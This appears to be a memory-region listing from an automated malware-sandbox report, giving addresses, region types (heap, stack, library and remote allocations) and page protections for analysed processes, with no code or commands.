page read and write
|
||
|
25D79417000
|
heap
|
page read and write
|
||
|
1435A0FC000
|
heap
|
page read and write
|
||
|
1B7D7230000
|
heap
|
page read and write
|
||
|
185E87D0000
|
remote allocation
|
page read and write
|
||
|
7FFD34342000
|
trusted library allocation
|
page read and write
|
||
|
141D2F67000
|
heap
|
page read and write
|
||
|
1435BF44000
|
heap
|
page read and write
|
||
|
7FFD34350000
|
trusted library allocation
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
141D1018000
|
heap
|
page read and write
|
||
|
1435BF55000
|
heap
|
page read and write
|
||
|
1435BE62000
|
heap
|
page read and write
|
||
|
1435A0ED000
|
heap
|
page read and write
|
||
|
25D003DE000
|
trusted library allocation
|
page read and write
|
||
|
185E93DF000
|
heap
|
page read and write
|
||
|
13F992DB000
|
trusted library allocation
|
page read and write
|
||
|
13F94580000
|
heap
|
page read and write
|
||
|
25D7758D000
|
heap
|
page read and write
|
||
|
141D2E8C000
|
heap
|
page read and write
|
||
|
E44EF37000
|
stack
|
page read and write
|
||
|
13F9A6DB000
|
trusted library allocation
|
page read and write
|
||
|
CEBD4E000
|
stack
|
page read and write
|
||
|
185E9239000
|
heap
|
page read and write
|
||
|
1435BE9F000
|
heap
|
page read and write
|
||
|
1435C05D000
|
heap
|
page read and write
|
||
|
1435BF4C000
|
heap
|
page read and write
|
||
|
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
|
1435A0FC000
|
heap
|
page read and write
|
||
|
1435BEAB000
|
heap
|
page read and write
|
||
|
141D2EA7000
|
heap
|
page read and write
|
||
|
7FFD34370000
|
trusted library allocation
|
page read and write
|
||
|
141D4CE0000
|
trusted library allocation
|
page read and write
|
||
|
141D11DD000
|
heap
|
page read and write
|
||
|
1435BEB3000
|
heap
|
page read and write
|
||
|
7FFD34410000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345C0000
|
trusted library allocation
|
page read and write
|
||
|
141D307C000
|
heap
|
page read and write
|
||
|
185E929A000
|
heap
|
page read and write
|
||
|
1435A100000
|
heap
|
page read and write
|
||
|
141D101F000
|
heap
|
page read and write
|
||
|
185E85E1000
|
heap
|
page read and write
|
||
|
7FFD34416000
|
trusted library allocation
|
page read and write
|
||
|
185E93C9000
|
heap
|
page read and write
|
||
|
185E8820000
|
heap
|
page read and write
|
||
|
185E88D5000
|
heap
|
page read and write
|
||
|
185E85C1000
|
heap
|
page read and write
|
||
|
185E883D000
|
heap
|
page read and write
|
||
|
25D003BC000
|
trusted library allocation
|
page read and write
|
||
|
141D2EAC000
|
heap
|
page read and write
|
||
|
13F941DC000
|
heap
|
page read and write
|
||
|
25329C9000
|
stack
|
page read and write
|
||
|
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
|
25D00146000
|
trusted library allocation
|
page read and write
|
||
|
25D003C0000
|
trusted library allocation
|
page read and write
|
||
|
2532CFE000
|
stack
|
page read and write
|
||
|
1435A375000
|
heap
|
page read and write
|
||
|
1B7D7430000
|
heap
|
page execute and read and write
|
||
|
25D77380000
|
heap
|
page read and write
|
||
|
141D49F5000
|
heap
|
page read and write
|
||
|
185E8905000
|
heap
|
page read and write
|
||
|
1B7D72D7000
|
heap
|
page read and write
|
||
|
7FFD34670000
|
trusted library allocation
|
page read and write
|
||
|
1B7D7B5C000
|
trusted library allocation
|
page read and write
|
||
|
1435BF31000
|
heap
|
page read and write
|
||
|
CEAA73000
|
stack
|
page read and write
|
||
|
7FFD34590000
|
trusted library allocation
|
page read and write
|
||
|
13F95BF0000
|
heap
|
page readonly
|
||
|
7FFD34640000
|
trusted library allocation
|
page read and write
|
||
|
14359F60000
|
heap
|
page read and write
|
||
|
185E93C9000
|
heap
|
page read and write
|
||
|
185E85F6000
|
heap
|
page read and write
|
||
|
979AAFE000
|
stack
|
page read and write
|
||
|
1435BF1C000
|
heap
|
page read and write
|
||
|
13F9662A000
|
trusted library allocation
|
page read and write
|
||
|
185E88FF000
|
heap
|
page read and write
|
||
|
1B7D6D88000
|
heap
|
page read and write
|
||
|
7FFD343F6000
|
trusted library allocation
|
page read and write
|
||
|
141D0FFD000
|
heap
|
page read and write
|
||
|
141D101E000
|
heap
|
page read and write
|
||
|
141D2ECC000
|
heap
|
page read and write
|
||
|
1435BEAC000
|
heap
|
page read and write
|
||
|
227DDFE000
|
stack
|
page read and write
|
||
|
141D2F19000
|
heap
|
page read and write
|
||
|
185E93B1000
|
heap
|
page read and write
|
||
|
E44F2BB000
|
stack
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
979ABBF000
|
stack
|
page read and write
|
||
|
185E88A5000
|
heap
|
page read and write
|
||
|
141D11D9000
|
heap
|
page read and write
|
||
|
185E8908000
|
heap
|
page read and write
|
||
|
1B7D75A9000
|
trusted library allocation
|
page read and write
|
||
|
185E6740000
|
heap
|
page read and write
|
||
|
185E85CA000
|
heap
|
page read and write
|
||
|
185E92AB000
|
heap
|
page read and write
|
||
|
13F97EDB000
|
trusted library allocation
|
page read and write
|
||
|
CEACFD000
|
stack
|
page read and write
|
||
|
185E93AB000
|
heap
|
page read and write
|
||
|
1435A058000
|
heap
|
page read and write
|
||
|
1435BE60000
|
heap
|
page read and write
|
||
|
185E8633000
|
heap
|
page read and write
|
||
|
7FFD34343000
|
trusted library allocation
|
page execute and read and write
|
||
|
1435A05F000
|
heap
|
page read and write
|
||
|
1435A028000
|
heap
|
page read and write
|
||
|
141D2F21000
|
heap
|
page read and write
|
||
|
141D11D8000
|
heap
|
page read and write
|
||
|
141D2F05000
|
heap
|
page read and write
|
||
|
1435A0F0000
|
heap
|
page read and write
|
||
|
1435BF44000
|
heap
|
page read and write
|
||
|
185E93B1000
|
heap
|
page read and write
|
||
|
141D0F8E000
|
heap
|
page read and write
|
||
|
7FFD34600000
|
trusted library allocation
|
page read and write
|
||
|
13F96096000
|
heap
|
page read and write
|
||
|
141D2F60000
|
heap
|
page read and write
|
||
|
1435BE6C000
|
heap
|
page read and write
|
||
|
E44ED7E000
|
stack
|
page read and write
|
||
|
185E88F6000
|
heap
|
page read and write
|
||
|
185E93DC000
|
heap
|
page read and write
|
||
|
185E85CD000
|
heap
|
page read and write
|
||
|
185E8826000
|
heap
|
page read and write
|
||
|
227D4FE000
|
stack
|
page read and write
|
||
|
1B7D5248000
|
heap
|
page read and write
|
||
|
141D2F39000
|
heap
|
page read and write
|
||
|
141D2EF0000
|
heap
|
page read and write
|
||
|
13F96230000
|
heap
|
page read and write
|
||
|
979A55E000
|
stack
|
page read and write
|
||
|
185E88D5000
|
heap
|
page read and write
|
||
|
185E93D2000
|
heap
|
page read and write
|
||
|
185E8893000
|
heap
|
page read and write
|
||
|
1B7D79FB000
|
trusted library allocation
|
page read and write
|
||
|
185E67D7000
|
heap
|
page read and write
|
||
|
141D2B30000
|
heap
|
page read and write
|
||
|
185E93DF000
|
heap
|
page read and write
|
||
|
1435BE87000
|
heap
|
page read and write
|
||
|
25D005C2000
|
trusted library allocation
|
page read and write
|
||
|
185E866B000
|
heap
|
page read and write
|
||
|
1B7D7299000
|
heap
|
page read and write
|
||
|
7FFD34530000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7D7B6F000
|
trusted library allocation
|
page read and write
|
||
|
1435A0F2000
|
heap
|
page read and write
|
||
|
13F94560000
|
heap
|
page read and write
|
||
|
141D0F86000
|
heap
|
page read and write
|
||
|
1435A0C2000
|
heap
|
page read and write
|
||
|
185E88FD000
|
heap
|
page read and write
|
||
|
1B7D7897000
|
trusted library allocation
|
page read and write
|
||
|
185E87D0000
|
remote allocation
|
page read and write
|
||
|
141D2EA7000
|
heap
|
page read and write
|
||
|
141D102A000
|
heap
|
page read and write
|
||
|
185E93AB000
|
heap
|
page read and write
|
||
|
141D2E8F000
|
heap
|
page read and write
|
||
|
1435A042000
|
heap
|
page read and write
|
||
|
185E85DD000
|
heap
|
page read and write
|
||
|
185E85CD000
|
heap
|
page read and write
|
||
|
185E6760000
|
heap
|
page read and write
|
||
|
1435BE66000
|
heap
|
page read and write
|
||
|
185E6895000
|
heap
|
page read and write
|
||
|
141D2F0D000
|
heap
|
page read and write
|
||
|
141D101C000
|
heap
|
page read and write
|
||
|
25D79190000
|
heap
|
page read and write
|
||
|
141D0F58000
|
heap
|
page read and write
|
||
|
185E8824000
|
heap
|
page read and write
|
||
|
1435BEA7000
|
heap
|
page read and write
|
||
|
185E85E7000
|
heap
|
page read and write
|
||
|
185E93CB000
|
heap
|
page read and write
|
||
|
13F97A9B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
|
141D101A000
|
heap
|
page read and write
|
||
|
1435BE6F000
|
heap
|
page read and write
|
||
|
1435C061000
|
heap
|
page read and write
|
||
|
185E85EE000
|
heap
|
page read and write
|
||
|
185E88C1000
|
heap
|
page read and write
|
||
|
1B7D5289000
|
heap
|
page read and write
|
||
|
1B7D6C30000
|
trusted library allocation
|
page read and write
|
||
|
2F0C2F9000
|
stack
|
page read and write
|
||
|
141D2F70000
|
heap
|
page read and write
|
||
|
13F96697000
|
trusted library allocation
|
page read and write
|
||
|
185E861D000
|
heap
|
page read and write
|
||
|
185E93AB000
|
heap
|
page read and write
|
||
|
185E6812000
|
heap
|
page read and write
|
||
|
141D0F86000
|
heap
|
page read and write
|
||
|
141D2EC4000
|
heap
|
page read and write
|
||
|
185E8877000
|
heap
|
page read and write
|
||
|
185E890D000
|
heap
|
page read and write
|
||
|
141D0F8A000
|
heap
|
page read and write
|
||
|
1435BF59000
|
heap
|
page read and write
|
||
|
185E8920000
|
heap
|
page read and write
|
||
|
7FFD34363000
|
trusted library allocation
|
page execute and read and write
|
||
|
185E93AB000
|
heap
|
page read and write
|
||
|
227DAFE000
|
stack
|
page read and write
|
||
|
25D00105000
|
trusted library allocation
|
page read and write
|
||
|
14359F50000
|
heap
|
page read and write
|
||
|
141D2F6B000
|
heap
|
page read and write
|
||
|
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
|
CEADFE000
|
stack
|
page read and write
|
||
|
13F9665E000
|
trusted library allocation
|
page read and write
|
||
|
185E85D1000
|
heap
|
page read and write
|
||
|
E44F03E000
|
stack
|
page read and write
|
||
|
141D49EC000
|
heap
|
page read and write
|
||
|
1B7D7258000
|
heap
|
page read and write
|
There are 852 hidden memdumps, click here to show them.